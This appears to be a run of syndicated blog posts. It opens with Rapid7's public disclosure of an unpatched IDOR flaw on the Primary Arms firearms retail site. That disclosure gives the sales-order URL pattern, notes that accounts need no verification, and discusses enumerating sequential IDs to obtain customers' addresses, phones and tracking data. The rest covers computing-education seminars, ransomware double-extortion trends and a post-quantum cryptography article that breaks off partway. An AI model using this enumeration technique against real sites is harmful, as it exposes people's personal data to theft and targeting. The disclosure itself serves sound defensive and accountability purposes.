Rapid7 is disclosing this vulnerability with the intent of providing information that has the potential to help protect the people who may be affected by it – in this case, Primary Arms users. Rapid7 regularly conducts vulnerability research and disclosure on a wide variety of technologies with the goal of improving cybersecurity. We typically disclose vulnerabilities to the vendor first and, in many cases, to vulnerability disclosure coordinators like CERT/CC. In situations where our previous disclosure through the aforementioned channels does not result in progress towards a solution or fix, we disclose unpatched vulnerabilities publicly. In this case, Rapid7 reached out to Primary Arms and federal and state agencies multiple times over a period of months (see “Disclosure Timeline,” below), but the vulnerability has yet to be addressed.

Vulnerabilities in specific websites are usually unremarkable, don’t usually warrant a CVE identifier, and are found and fixed every day. However, Rapid7 has historically publicized issues that presented an outsized risk to specific populations, were popularly mischaracterized, or remained poorly addressed by those most responsible. Some examples that leap to mind are the issues experienced by Ashley Madison and Grindr users, as well as a somewhat similar Yopify plugin issue for Shopify-powered e-commerce sites.

If exploited, this vulnerability has the potential to allow an authorized user to view the personally identifiable information (PII) of Primary Arms customers, including their home address, phone number, and tracking information for purchases. Note that “authorized users” includes all Primary Arms customers, and user account creation is free and unrestricted.

Because this is a vulnerability on a single website, no CVE identifier has been assigned for this issue. We estimate the CVSSv3.1 calculation to be 4.3 (AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N), or 5.3 (PR:N) if one considers that this vulnerability is exploitable by any person able to complete a web form.

Product description

Primary Arms is an online firearms and firearms accessories retailer based in Houston, Texas. According to their website, they cater to “firearms enthusiasts, professional shooters, and servicemen and women” and ship firearms to holders of a Federal Firearms License (FFL). The website is built with NetSuite SuiteCommerce.

Discoverer

This issue was discovered by a Rapid7 security researcher and penetration tester through the normal course of personal business as a customer of Primary Arms. It is being disclosed in accordance with Rapid7’s vulnerability disclosure policy.

Exploitation

An authenticated user can inspect the purchase information of other Primary Arms customers by manually navigating to a known or guessed sales order record URL, as demonstrated in the series of screenshots below.

First, in order to demonstrate the vulnerability, I created an account with the username [email protected], which I call “FakeTod FakeBeardsley.”

Note that FakeTod has no purchase history:

[Screenshot: FakeTod’s account showing no purchase history]

Next, I’ll simply navigate to the URL of a real purchase, made under my “real” account. An actual attacker would need to learn or guess this URL, which may be easy or difficult (see Impact, below). The screenshot below is a (redacted) view of that sales order receipt.

[Screenshot: redacted sales order receipt]

The redacted URL is hxxps://www.primaryarms.com/sca-dev-2019-2/my_account.ssp#purchases/view/salesorder/85460532, and the final 8-digit salesorder value is the insecure direct object reference. In this case, we can see:

  • Customer name
  • Purchased item
  • Last four digits and issuer of the credit card used
  • Billing address and phone number

Manipulating this value produces other sets of PII from other customers, though the distribution is non-uniform and currently unknown (see below, under Impact, for more information).

If a given salesorder reference includes a shipped item, that tracking information is also displayed, as shown in this redacted example:

[Screenshot: redacted sales order showing shipment tracking information]

Depending on the carrier and the age of the ordered item, this tracking information could then be used to monitor and possibly intercept delivery of the shipped items.

Root cause

The landing page for primaryarms.com and other pages have this auto-generated comment in the HTML source:

<!-- SuiteCommerce [ prodbundle_id "295132" ] [ baselabel "SC_2019.2" ] [ version "2019.2.3.a" ] [ datelabel "2020.00.00" ] [ buildno "0" ] -->
<!-- 361 s: 25% #59 cache: 4% #17 -->
<!-- Host [ sh14.prod.bos ] App Version [ 2022.1.15.30433 ] -->
<!-- COMPID [ 3901023 ] URL [ /s.nl ] Time [ Mon Jul 11 09:33:51 PDT 2022 ] -->
<!-- Not logging slowest SQL -->

This indicates a somewhat old version of SuiteCommerce, from 2019, being run in production. It’s hard to say for sure that this is the culprit of the issue, or even if this comment is accurate, but our colleagues at CERT/CC noticed that NetSuite released an update in 2020 that addressed CVE-2020-14728, which may be related to this IDOR.

Outside of this hint, the root cause of this issue is unknown at the time of this writing. It may be as straightforward as updating the local NetSuite instance, or there may be more local configuration needed to ensure that sales order receipts require proper authentication in order to read them.

Post-authentication considerations

Note that becoming an authenticated user is trivial for the Primary Arms website. New users are invited to create an account, and while a validly formatted email address is required, it is never verified. In the example gathered here, the simulated attacker, FakeTod, has the nonexistent email address of [email protected]. Therefore, there is no practical difference between an unauthenticated user and an authenticated user for the purpose of exploitation.

Impact

By exploiting this vulnerability, an attacker can learn the PII of likely firearms enthusiasts. However, exploiting this vulnerability at a reasonable scale may prove somewhat challenging.

Possible valid IDOR values

It is currently unknown how the salesorder values are generated, as Rapid7 has conducted only very limited testing, merely to validate the existence of the IDOR issue. We’re left with two possibilities.

The likely case is that the salesorder values are sequential, start at a fixed point in the 8-digit space, and increment with every new transaction in a predictable way. If so, exhausting the possible space of valid IDOR values is fairly trivial — only a few seconds to automate the discovery of newly created sales order records, and a few minutes to gather all past records. While limited testing indicates salesorder values are sequential, there are gaps in the sequence, likely due to abandoned and partial orders. We have not fully explored the attack surface of this issue out of an abundance of caution and restraint.

In the worst case (for the attacker), the numbers may be purely random out of a space of 100 million possible values. This seems unlikely according to Rapid7’s limited testing. If this is the case, however, exhausting the entire space for all records would take about two years, assuming an average of 100 queries per second (this probing would be noticeable by the website operators, assuming normal website instrumentation).

The truth of the salesorder value generation is probably closer to the former than the latter, given past experience with similar bugs of this nature, which leads us to make this disclosure in the interest of public safety; the possible attacks are documented in the next section.

Possible attacks

We can imagine a few scenarios where attackers might find this collection of PII useful. The most obvious attack would be a follow-on phishing attack, identity theft, or other confidence scam, since PII is often useful in executing successful social engineering attacks. An attacker could pose as Primary Arms, a related organization, or the customer, and be very convincing in that identity (to a third party) when armed with the name, address, phone number, last four digits of a credit card, and recent purchase history.

Additionally, typical Primary Arms customers are self-identified firearms owners and enthusiasts. A recent data breach in June of 2022 involving California Concealed Carry License holders caused a stir among firearms enthusiasts, who worry that the breach would “increase the risk criminals will target their homes for burglaries.”

Indeed, if it is possible to see recent transactions (again, depending on how salesorder values are generated), especially those involving FFL holders, it may be possible for criminals to intercept firearms and firearms accessories in transit by targeting specific delivery addresses.

Finally, there is the potential that domestic terrorist organizations and foreign intelligence operations could use this highly specialized PII in recruiting, disinformation, and propaganda efforts.

Remediation

As mentioned above, it would appear that only Primary Arms is in a position to address this issue. We suspect this issue may be resolved by using a more current release of NetSuite SuiteCommerce. A similar e-commerce site, using similar technology but with a more updated version of SuiteCommerce, appears not to be subject to this specific attack technique, so it’s unlikely this is a novel vulnerability in the underlying web technology stack.

Customers affected by this issue are encouraged to try to contact Primary Arms, either by email to [email protected], or by calling customer service at +1 713.344.9600.

Disclosure timeline

At the time of this writing, Primary Arms has not been responsive to disclosure efforts by Rapid7, CERT/CC, or TX-ISAO.

  • May 2022 – Issue discovered by a Rapid7 security researcher
  • Mon, May 16, 2022 – Initial contact to Primary Arms at [email protected]
  • Wed, May 25, 2022 – Attempt to contact Primary Arms CTO via guessed email address
  • Wed, May 25, 2022 – Internal write-up of IDOR issue completed and validated
  • Thu, May 26, 2022 – Attempt to contact Primary Arms CEO via guessed email address
  • Tue, May 31, 2022 – Called customer support, asked for clarification on contact, reported issue
  • Thu, Jun 1, 2022 – Notified CERT/CC via [email protected] asking for advice
  • Fri, Jun 10, 2022  – Opened a case with CERT/CC, VRF#22-06-QFRZJ
  • Thu, Jun 16, 2022  – CERT/CC begins investigation and disclosure attempts, VU#615142
  • June-July 2022 – Collaboration with CERT/CC to validate and scope the issue
  • Mon, Jul 11, 2022 – Completed disclosure documentation presuming no contact from Primary Arms
  • Tue, Jul 12, 2022 – Sent a paper copy of this disclosure to Primary Arms via certified US mail, tracking number: 420770479514806664112193691642
  • Thu, Jul 14, 2022 – Disclosed details to the Texas Information Sharing and Analysis Organization (TX-ISAO), Report #ISAO-CT-0052
  • Mon, Jul 18, 2022 – Paper copy received by Primary Arms
  • Tue, Aug 2, 2022 – This public disclosure

Using e-textiles to deliver equitable computing lessons and broaden participation

Post Syndicated from Katharine Childs original https://www.raspberrypi.org/blog/using-e-textiles-to-deliver-equitable-computing-lessons-and-broaden-participation/

In our current series of research seminars, we are exploring how computing can be connected to other subjects using cross-disciplinary approaches. In July 2022, our speakers were Professor Yasmin Kafai from the University of Pennsylvania and Elaine Griggs, an award-winning teacher from Pembroke High School, Massachusetts, and we heard about their use of e-textiles to engage learners and broaden participation in computing. 

Professor Yasmin Kafai illustrated her research with a wonderful background made up of young people’s e-textile projects

Building new clubhouses

The spaces where young people learn about computing have sometimes been referred to as clubhouses to relate them to the places where sports or social clubs meet. A computing clubhouse can be a place where learners come together to take part in computing activities and gain a sense of community. However, as Yasmin pointed out, research has found that computing clubhouses have also often been dominated by electronics and robotics activities. This has led to clubhouses being perceived as exclusive spaces for only the young people who share those interests.

Yasmin’s work is motivated by the idea of building new clubhouses that include a wide range of computing interests, with a specific focus on spaces for e-textile activities, to show that diverse uses of computing are valued. 

A group of young people share their projects at Coolest Projects

Yasmin’s research into learning through e-textiles has taken place in formal computing lessons in high schools in America, by developing and using a unit from the Exploring Computer Science curriculum called “Stitching the Loop”. In the seminar, we were fortunate to be joined by Elaine, a computer science and robotics teacher who has used the scheme of work in her classroom. Elaine’s learners have designed wearable electronic textile projects with microcontrollers, sensors, LEDs, and conductive thread. With these materials, learners have made items such as paper circuits, wristbands, and collaborative banners, as shown in the examples below. 

alt=""
 Items created by learners in the e-textile units of work

Teaching approaches for equity-oriented learning

The hands-on, project-based approach in the e-textile unit has many similarities with the principles underpinning the work we do at the Raspberry Pi Foundation. However, there were also two specific teaching approaches that were embedded in Elaine’s teaching in order to promote equitable learning in the computing classroom: 

  1. Prioritising time for learners to design their artefacts at the start of the activity.
  2. Reflecting on learning through the use of a digital portfolio.  

Making time for design

As teachers with a set of learning outcomes to deliver, we can often feel a certain pressure to structure lessons so that our learners spend the most time on activities that we feel will deliver those outcomes. I was very interested to hear how in these e-textile projects, there was a deliberate choice to foreground the aesthetics. When learners spent time designing their artefacts and could link it to their own interests, they had a sense of personal ownership over what they were making, which encouraged them to persevere and overcome any difficulties with sewing, code, or electronics. 

Title: Process of making your project.   Learner's reflection: One main challenge that I faced while making this project was setting up my circuit diagram. I had trouble setting up where all my lights were gonna be placed at, and I had trouble color coding where the negatives and positives would be at. I sketched about 6 different papers and the 6th page was the one that came out fine because all of the other ones had negative and positive crossings which was not gonna help the program work, so I was finally able to get my diagram correct.
Spending time on design helped this learner to persevere with problem-solving

My personal reflection was that creating a digital textiles project based on a set template could be considered the equivalent of teaching programming by copying code. Both approaches would increase the chances of a successful output, but wouldn’t necessarily increase learners’ understanding of computing concepts, nor encourage learners to perceive computing as a subject where everyone belongs. I was inspired by the insights shared at the seminar about how prioritising design time can lead to more diverse representations of making. 

Reflecting on learning using a digital portfolio

Elaine told us that learners were encouraged to create a digital portfolio which included photographs of the different stages of their project, examples of their code, and reflections on the problems that they had solved during the project. In the picture below, the learner has shared both the ‘wrong’ and ‘right’ versions of their code, along with an explanation of how they debugged the error. 

A student portfolio with the title 'Coding Challenge'. The wrong code is on the left-hand side and the right code is on the right. The student has included an explanation beneath the wrong code: This is the wrong code. The problem I had was that I was putting the semicolon outside of the bracket. But the revision I needed was putting the semicolon inside of the bracket. That problem was a hard one to see because it is a very minor problem and most people wouldn't have caught it.
A learner’s example of debugging code from their portfolio

Yasmin explained the equity-oriented theories underpinning the digital portfolio teaching approach. The learners’ reflections allowed deeper understanding of the computing and electronics concepts involved and helped to balance the personalised nature of their artefacts with the need to meet learning goals.

Yasmin also emphasised how important it was for learners to take part in a series of projects so that they encountered computing and electronics concepts more than once. In this way, reflective journalling can be seen as an equitable teaching approach because it helps to move learners on from their initial engagement into more complex projects. Thinking back to the clubhouse model, it is equally important for learners to be valued for their complex e-textile projects as it is for their complex robotics projects, and so portfolios of a series of e-textile projects show that a diverse range of learners can be successful in computing at the highest levels. 

Try e-textiles with your learners

alt=""
Science and nature models made with an RPF project

If you’re thinking about ways of introducing e-textile activities to your learners, there are some useful resources here: 

  • The Exploring Computer Science page contains all the information and resources relating to the “Stitching the Loop” electronic textiles unit. You can also find the video that Yasmin and Elaine shared during the seminar. 
  • For e-textiles in a non-formal learning space, the StitchFest webpage has lots of information about an e-textile hackathon that took place in 2014, designed to broaden participation and perceptions in computing. 
  • “3D LED science display with Scratch” is a project that combines using LEDs with science and nature to create a 3D installation. This project is from the Raspberry Pi Foundation’s “Physical computing with Scratch and the Raspberry Pi” projects pathway.

Looking forward to our next free seminar

We’re having a short break in the seminar series but will be back in September when we’ll be continuing to find out more about cross-disciplinary approaches to computing.

In our next seminar on Tuesday 6 September 2022 at 17:00–18:30 BST / 12:00–13:30 EST / 9:00–10:30 PST / 18:00–19:30 CEST, we’ll be hearing all about the links between computing and dance, with our speaker Genevieve Smith-Nunes (University of Cambridge). Genevieve will be speaking about data ethics for the computing classroom through biometrics, ballet, and augmented reality (AR) which promises to be a fascinating perspective on bringing computing to new audiences.

To Maze and Beyond: How the Ransomware Double Extortion Space Has Evolved

Post Syndicated from Tom Caiazza original https://blog.rapid7.com/2022/07/27/to-maze-and-beyond-how-the-ransomware-double-extortion-space-has-evolved/

To Maze and Beyond: How the Ransomware Double Extortion Space Has Evolved

We’re here with the final installment in our Pain Points: Ransomware Data Disclosure Trends report blog series, and today we’re looking at a unique aspect of the report that clarifies not just what ransomware actors choose to disclose, but who discloses what, and how the ransomware landscape has changed over the last two years.

Firstly, we should tell you that our research centered around the concept of double extortion. Unlike traditional ransomware attacks, where bad actors take over a victim’s network and hold the data hostage for ransom, double extortion takes it a step further and extorts the victim for more money with the threat (and, in some cases, execution) of the release of sensitive data. So not only does a victim experience a ransomware attack, they also experience a data breach, and the additional risk of that data becoming publicly available if they do not pay.

According to our research, there were a handful of major players in the double extortion field between April 2020, when our data begins, and February 2022. Double extortion itself was in many ways pioneered by the Maze ransomware group, so it should not surprise anyone that we will focus on them first.

The rise and fall of Maze and the splintering of ransomware double extortion

Maze’s influence on the current state of ransomware cannot be overstated. Prior to the group’s pioneering of double extortion, many ransomware actors intended to sell the data they encrypted to other criminal entities. Maze, however, popularized another revenue stream for these bad actors, leaning on the victims themselves for more money. Using coercive pressure, Maze did an end run around one of the most important safeguards organizations can take against ransomware: having safely secured and regularly updated backups of their important data.

Throughout most of 2020, Maze was the leader of the double extortion tactic among ransomware groups, accounting for 30% of the 94 reported cases of double extortion between April and December of 2020. This is even more remarkable given the fact that Maze itself was shut down in November of 2020.

Other top ransomware groups also accounted for large percentages of data disclosures. For instance, in that same year, REvil/Sodinokibi accounted for 19%, Conti accounted for 14%, and NetWalker 12%. To give some indication of just how big Maze’s influence was and offer explanation for what happened after they were shut down, Maze and REvil/Sodinokibi accounted for nearly half of all double extortion attacks that year.

However, once Maze was out of the way, double extortion still continued, just with far more players taking smaller pieces of the pie. Conti and REvil/Sodinokibi were still major players in 2021, but their combined market share barely ticked up, making up just 35% of the market even without Maze dominating the space. Conti accounted for 19%, and REvil/Sodinokibi dropped to 16%.

But other smaller players saw increases in 2021. CL0P’s market share rose to 9%, making it the third most active group. Darkside and RansomEXX both went from 2% in 2020 to 6% in 2021. There were 16 other groups who came onto the scene, but none of them took more than 5% market share. Essentially, with Maze out of the way, the ransomware market splintered with even the big groups from the year before being unable to step in and fill Maze’s shoes.

What they steal depends on who they are

Different ransomware groups have their own preferred types of data to steal, release, and hold hostage. REvil/Sodinokibi focused heavily on releasing customer and patient data (present in 55% of their disclosures), finance and accounting data (also 55%), employee PII and HR data (52%), and sales and marketing data (48%).

CL0P, on the other hand, was far more focused on employee PII and HR data, with that type of information present in 70% of its disclosures, more than double any other type of data. Conti overwhelmingly focused on finance and accounting data (present in 81% of their disclosures), whereas customer and patient data appeared in just 42% of disclosures and employee PII and HR data in just 27%.

Ultimately, these organizations have their own unique interests in the type of data they choose to steal and release during the double extortion layer of their ransomware attacks. They can act as calling cards for the different groups that help illuminate the inner workings of the ransomware ecosystem.

Thank you for joining us on this unprecedented dive into the world of double extortion as told through the data disclosures themselves. To dive even deeper into the data, download the full report.


Are you technocentric? Shifting from technology to people

Post Syndicated from Jane Waite original https://www.raspberrypi.org/blog/technocentrism-shifting-from-technology-to-people-computing-education-pratim-sengupta-research-seminar/

When we teach children and young people about computing, do we consider how the subject has developed over time, how it relates to our students’ lives, and importantly, what our values are? Professor Pratim Sengupta shared some of the research he and his colleagues have been working on related to these questions in our June 2022 research seminar.

Prof. Pratim Sengupta

Pratim revealed a complex landscape where we as educators can be easily trapped by what may seem like good intentions, thereby limiting learning and excluding some students. His presentation, entitled Computational heterogeneity in STEM education, introduced me to the concept of technocentrism and profoundly impacted my thinking about the essence of programming and how I research it. In this blog post, particularly for those unable to attend this stimulating seminar, I give my simplified view of the rich philosophy shared by Pratim, and my fledgling steps to admit to my technocentrism and overcome it.

Our seminars on teaching cross-disciplinary computing

Between May 2022 and November 2022, we are hosting a new series of free research seminars about teaching computing in different ways and in different contexts. This second seminar of the series was well attended with participants from the USA, Asia, Africa, and Europe, including teachers, researchers, and industry professionals, who contributed to a lively and thought-provoking discussion.

Two teachers and a group of learners are gathered around a laptop screen.

Pratim is a learning scientist based in Canada with a long and distinguished career. He has studied how to teach computational modelling in K-12 STEM classrooms and investigates the complexity of learning. Grounded in working with teachers and students, he brings together computing, science, education, and social justice. Based on his work at Northwestern University, Vanderbilt University, and now with the Mind, Matter and Media lab at the University of Calgary, Pratim has published hundreds of academic papers over some 20 years. Pratim and his team challenge how we focus on making technological artefacts — code for code’s sake — in computing education, and refocus us on the human experience of coding and learning to code.

What is technocentrism?

Pratim started the seminar by giving us an overview of some of the key ideas that underpin the way that computing is usually taught in schools, including technocentrism (Figure 1).

Pratim Sengupta's summary of technocentrism: device-centred approaches for pedagogy and computational design; ignores teaching, social and institutional infrastructures, cultural histories; transparency or universality of code as symbolic power; recursive methods for education research, experience measured by being folded back onto devices; leads to symbolic violence, misrecognition of experience, muting and omission of voices, affect and moral dimensions of experience.
Figure 1: The features of technocentrism, a way of thinking about how we teach computing, particularly programming (Sengupta, 2022). Click to enlarge.

I have come to a simplified understanding of technocentrism. To me, it appears to be a way of looking at how we learn about computer science, where one might:

  • Focus on the finished product (e.g. a computer program), rather than thinking about the people who create, learn about, or use a program
  • Ignore the context and the environment, rather than paying attention to the history, the political situation, and the social context of the task at hand
  • View computing tasks as being implemented (enacted) by writing code, rather than seeing computing activities as rich and complex jumbles of meaning-making and communication that involve people using chatter, images, and lots of gestures
  • Anchor learning in concepts and skills, rather than placing the values and viewpoints of learners at the heart of teaching 

Examples of technocentrism and how to overcome it

Pratim recounted several research activities that he and his team have engaged with. These examples highlight instances of potential technocentrism and investigate how we might overcome it.

In the first example research activity, Pratim explained how, in maths and physics lessons, middle school students were asked to develop models to solve time and distance problems. Rather than immediately coding a potential solution, the researcher and teacher supported the learners in spending plenty of time developing a shared perspective, so they could understand and express the problems first. Students grappled with different ways of representing the context, including graphs and diagrams (see Figure 2). Gradually and carefully, teachers helped students recognise what was important and what was not, moving them toward a meaningful language to describe and solve the problems.

Research results from Pratim Sengupta showing students' graph designs and how much time they spent on various activities during the graphing task.
Figure 2: Two graphs from students showing different representations of a context, and a researcher’s bar chart representing how students’ shared understanding emerged over time (Sengupta, 2022). Click to enlarge.

In a second example research activity, students were asked to build a machine that draws shapes using sensors, motors, and code. Rather than jumping straight to a solution, the students spent time with authentic users of their machines. Throughout the process, students worked with others, expressing the context through physical movement, clarifying their thoughts by drawing diagrams, and finding the sweet spot between coding, engineering design, and maths (see Figure 3).

Research results from Pratim Sengupta showing images documenting a physical computing design activity and how learners explained their design.
Figure 3:  Students used physical movements and user guides to be with others and publicly share and experience the task with authentic users (Sengupta, 2022). Click to enlarge.

In a third example research activity, racial segregation of US communities was discussed with pre-service teachers. The predominantly white teachers found talking about the topic very difficult at the beginning of the activity. To overcome this hesitancy, teachers were first asked to work with a simulation that modelled the process of segregation through abstracted dots (or computational agents), a transitional other. Following this hypothetical representation, the context was then recontextualised through a map of real data points of the ethnicity of residents in an area of the US; this kind of map, based on US census data, is called a Racial Dot Map. When the teachers were able to interpret the link between the abstracted dot simulation and the real-world data, they were able to talk about racism and segregation in a way they could not do before. The initial simulation and the recontextualisation were a pedagogical tool to reveal racism and provide a space where students felt comfortable discussing their values and beliefs that would otherwise have remained implicit.

Pratim Sengupta explains a research activity with predominantly white pre-service teachers who learned to discuss racism and segregation through a transitional othering activity using maps and graphing census data.
Figure 4: To facilitate discussion of racial segregation, a simulation was used that bridges abstracted dots and real people, giving pre-service teachers a space to reflect on discrimination  (Sengupta, 2022). Click to enlarge.

My takeaways

Pratim shared four implications of this research for computing pedagogy (see Figure 5).

Pratim Sengupta presents the pedagogical implications of shifting from technocentrism to perspectival heterogeneity in education: code as utterances and intertext; heterogeneity and tranformation of representational genres, code lives in translation; teachers' voice needs to be centred in system and activity design and classroom work, researchers must listen; uncertainty and ambiguity play central roles, recognition takes time.
Figure 5: Pratim’s four implications for pedagogy. Click to enlarge

As a researcher of pedagogy, these points provide takeaways that I can relate to my own research practice:

  • Code is a voice within an experience rather than symbols at a point in time. For example, when I listen to students predicting what a snippet of code will do, I think of the active nature of each carefully chosen command and how for each student, the code corresponds with them differently.
  • Code lives as a translation bridging many dimensions, such as data representation, algorithms, syntax, and user views. This statement resonates deeply with my appreciation of Carsten Schulte’s block model [1] but extends to include the people involved.
  • We should listen carefully and attentively to teachers, rather than making assumptions about what happens in classrooms. Teachers create new ideas. This takeaway is very important and reminds me about the trust and relationships built between teachers and researchers and how important it is to listen.
  • Uncertainty and ambiguity exist in learning, and this can take time to recognise. This final point makes me smile. As a developer, teacher, and researcher, I have found dealing with ambiguity hard at various points in my career. Still, over time, I think I am getting better at seeing it and celebrating it. 

Listening to Pratim share his research on the teaching and learning of computing and the pitfalls of technocentrism has made me think deeply about how I view computer science as a subject and do research about it. I have shared some of my reflections in this blog, and I plan to incorporate the underlying theory and ideas in my ongoing research projects.

If you would like to find out more about Pratim’s work, please look over his slides, watch his presentation, read the upcoming chapter in our seminar proceedings, or respond to this blog by leaving a comment so we can discuss!

Join our next seminar

We have another four seminars in our current series on cross-disciplinary computing.

At our next seminar on 12 July 2022 at 17:00–18:30 BST / 12:00–13:30 EDT / 9:00–10:30 PDT / 18:00–19:30 CEST, we will welcome Prof. Yasmin Kafai and Elaine Griggs, who are going to present research on introductory equity-oriented computer science with electronic textiles for high school students.

We look forward to meeting you there.


[1] You can learn more in the Hello World article where our Chief Learning Officer Sue Sentance talks about the block model.

The post Are you technocentric? Shifting from technology to people appeared first on Raspberry Pi.

NIST’s pleasant post-quantum surprise

Post Syndicated from Bas Westerbaan original https://blog.cloudflare.com/nist-post-quantum-surprise/

NIST’s pleasant post-quantum surprise


On Tuesday, the US National Institute of Standards and Technology (NIST) announced which post-quantum cryptography they will standardize. We were already drafting this post with an educated guess on the choice NIST would make. We almost got it right, except for a single choice we didn’t expect—and which changes everything.

At Cloudflare, post-quantum cryptography is a topic close to our heart, as the future of a secure and private Internet is on the line. We have been working towards this day for many years, by implementing post-quantum cryptography, contributing to standards, and testing post-quantum cryptography in practice, and we are excited to share our perspective.

In this long blog post, we explain how we got here, what NIST chose to standardize, what it will mean for the Internet, and what you need to know to get started with your own post-quantum preparations.

How we got here

Shor’s algorithm

Our story starts in 1994, when mathematician Peter Shor discovered a marvelous algorithm that efficiently factors numbers and computes discrete logarithms. With it, you can break nearly all public-key cryptography deployed today, including RSA and elliptic curve cryptography. Luckily, Shor’s algorithm doesn’t run on just any computer: it needs a quantum computer. Back in 1994, quantum computers existed only on paper.

But in the years since, physicists started building actual quantum computers. Initially, these machines were (and still are) too small and too error-prone to be threatening to the integrity of public-key cryptography, but there is a clear and impending danger: it only seems a matter of time now before a quantum computer is built that has the capability to break public-key cryptography. So what can we do?

Encryption, key agreement and signatures

To understand the risk, we need to distinguish between the three cryptographic primitives that are used to protect your connection when browsing on the Internet:

Symmetric encryption. With a symmetric cipher there is one key to encrypt and decrypt a message. They’re the workhorse of cryptography: they’re fast, well understood and luckily, as far as known, secure against quantum attacks. (We’ll touch on this later when we get to security levels.) Examples are AES and ChaCha20.
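
To make the symmetric case concrete, here is a small sketch using only Go’s standard library: AES-128 in GCM mode, an authenticated encryption mode in wide use today. It assumes both sides already share the same 16-byte key, which is exactly the problem the next primitive solves.

package main

import (
  "crypto/aes"
  "crypto/cipher"
  "crypto/rand"
  "fmt"
)

func main() {
  // A 16-byte key for AES-128; in practice this comes from a key agreement.
  key := make([]byte, 16)
  if _, err := rand.Read(key); err != nil {
    panic(err)
  }

  block, err := aes.NewCipher(key)
  if err != nil {
    panic(err)
  }
  aead, err := cipher.NewGCM(block) // authenticated encryption (AES-GCM)
  if err != nil {
    panic(err)
  }

  nonce := make([]byte, aead.NonceSize()) // must never repeat for the same key
  if _, err := rand.Read(nonce); err != nil {
    panic(err)
  }

  ciphertext := aead.Seal(nil, nonce, []byte("hello, post-quantum world"), nil)
  plaintext, err := aead.Open(nil, nonce, ciphertext, nil)
  if err != nil {
    panic(err)
  }
  fmt.Printf("decrypted: %s\n", plaintext)
}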

Symmetric encryption alone is not enough: which key do we use when visiting a website for the first time? We can’t just pick a random key and send it along in the clear, as then anyone surveilling that session would know that key as well. You’d think it’s impossible to communicate securely without ever having met, but there is some clever math to solve this.

Key agreement, also called a key exchange, allows two parties that never met to agree on a shared key. Even if someone is snooping, they are not able to figure out the agreed key. Examples include Diffie–Hellman over elliptic curves, such as X25519.

The key agreement prevents a passive observer from reading the contents of a session, but it doesn’t help defend against an attacker who sits in the middle and does two separate key agreements: one with you and one with the website you want to visit. To solve this, we need the final piece of cryptography:

Digital signatures, such as RSA, allow you to check that you’re actually talking to the right website with a chain of certificates going up to a certificate authority.

Shor’s algorithm breaks all widely deployed key agreement and digital signature schemes, which are both critical to the security of the Internet. However, the urgency and mitigation challenges between them are quite different.

Impact

Most signatures on the Internet have a relatively short lifespan. If we replace them before quantum computers can crack them, we’re golden. We shouldn’t be too complacent here: signatures aren’t that easy to replace as we will see later on.

More urgently, though, an attacker can store traffic today and decrypt later by breaking the key agreement using a quantum computer. Everything that’s sent on the Internet today (personal information, credit card numbers, keys, messages) is at risk.

NIST Competition

Luckily, cryptographers took note of Shor’s work early on and started working on post-quantum cryptography: cryptography not broken by quantum algorithms. In 2016, NIST, known for standardizing AES and SHA, opened a public competition to select which post-quantum algorithms it would standardize. Cryptographers from all over the world submitted algorithms and publicly scrutinized each other’s submissions. To focus attention, the list of potential candidates was whittled down over three rounds. From the original 82 submissions, eight made it into the final third round. From those eight, NIST chose one key agreement scheme and three signature schemes. Let’s have a look at the key agreement first.

What NIST announced

Key agreement

For key agreement, NIST picked only Kyber, which is a Key Encapsulation Mechanism (KEM). Let’s compare it side-by-side to an RSA-based KEM and the X25519 Diffie–Hellman key agreement:

Performance characteristics of Kyber and RSA. We compare instances of security level 1, see below. Timings vary considerably by platform and implementation constraints and should be taken as a rough indication only.
Performance characteristics of the X25519 Diffie–Hellman key agreement commonly used in TLS 1.3.
KEM versus Diffie–Hellman

To properly compare these numbers, we have to explain how KEM and Diffie–Hellman key agreements are different.

Protocol flow of KEM and Diffie-Hellman key agreement.

Let’s start with the KEM. A KEM is essentially a Public-Key Encryption (PKE) scheme tailored to encrypt shared secrets. To agree on a key, the initiator, typically the client, generates a fresh keypair and sends the public key over. The receiver, typically the server, generates a shared secret and encrypts (“encapsulates”) it for the initiator’s public key. It returns the ciphertext to the initiator, who finally decrypts (“decapsulates”) the shared secret with its private key.
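
As a concrete sketch of that flow, here is how it could look with Kyber512 from our CIRCL library (introduced later in this post). The package path and the GenerateKeyPair/Encapsulate/Decapsulate methods follow our recollection of CIRCL’s kem.Scheme interface; treat the exact names as an assumption that may have changed since writing.

package main

import (
  "bytes"
  "fmt"

  "github.com/cloudflare/circl/kem/kyber/kyber512"
)

func main() {
  scheme := kyber512.Scheme()

  // Initiator (client): generate a fresh keypair and send the public key over.
  pk, sk, err := scheme.GenerateKeyPair()
  if err != nil {
    panic(err)
  }

  // Receiver (server): encapsulate a fresh shared secret to that public key
  // and return the resulting ciphertext.
  ct, ssServer, err := scheme.Encapsulate(pk)
  if err != nil {
    panic(err)
  }

  // Initiator: decapsulate the ciphertext to recover the same shared secret.
  ssClient, err := scheme.Decapsulate(sk, ct)
  if err != nil {
    panic(err)
  }

  fmt.Println("shared secrets match:", bytes.Equal(ssServer, ssClient))
  fmt.Println("public key:", scheme.PublicKeySize(), "bytes; ciphertext:", scheme.CiphertextSize(), "bytes")
}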

With Diffie–Hellman, both parties generate a keypair. Because of the magic of Diffie–Hellman, there is a unique shared secret between every combination of a public and private key. Again, the initiator sends its public key. The receiver combines the received public key with its own private key to create the shared secret and returns its public key with which the initiator can also compute the shared secret.
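
For comparison, here is a minimal X25519 exchange using the golang.org/x/crypto/curve25519 package: each side keeps its 32-byte private scalar, only the public keys travel over the wire, and both sides arrive at the same shared secret.

package main

import (
  "bytes"
  "crypto/rand"
  "fmt"

  "golang.org/x/crypto/curve25519"
)

func main() {
  // Each party picks a random 32-byte private scalar.
  privA, privB := make([]byte, 32), make([]byte, 32)
  if _, err := rand.Read(privA); err != nil {
    panic(err)
  }
  if _, err := rand.Read(privB); err != nil {
    panic(err)
  }

  // Public keys are derived by multiplying the base point by the private scalar.
  pubA, _ := curve25519.X25519(privA, curve25519.Basepoint)
  pubB, _ := curve25519.X25519(privB, curve25519.Basepoint)

  // Combining your own private key with the other party's public key
  // yields the same 32-byte shared secret on both sides.
  sharedA, _ := curve25519.X25519(privA, pubB)
  sharedB, _ := curve25519.X25519(privB, pubA)

  fmt.Println("shared secrets match:", bytes.Equal(sharedA, sharedB))
}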

Interactive versus non-interactive key agreement

As an aside, in this simple key agreement (such as in TLS), there is not a big difference between using a KEM or Diffie–Hellman: the number of round-trips is exactly the same. In fact, we’re using Diffie–Hellman essentially as a KEM. This, however, is not the case for all protocols: for instance, the X3DH handshake of Signal can’t be done with plain KEMs and requires the full flexibility of Diffie–Hellman.

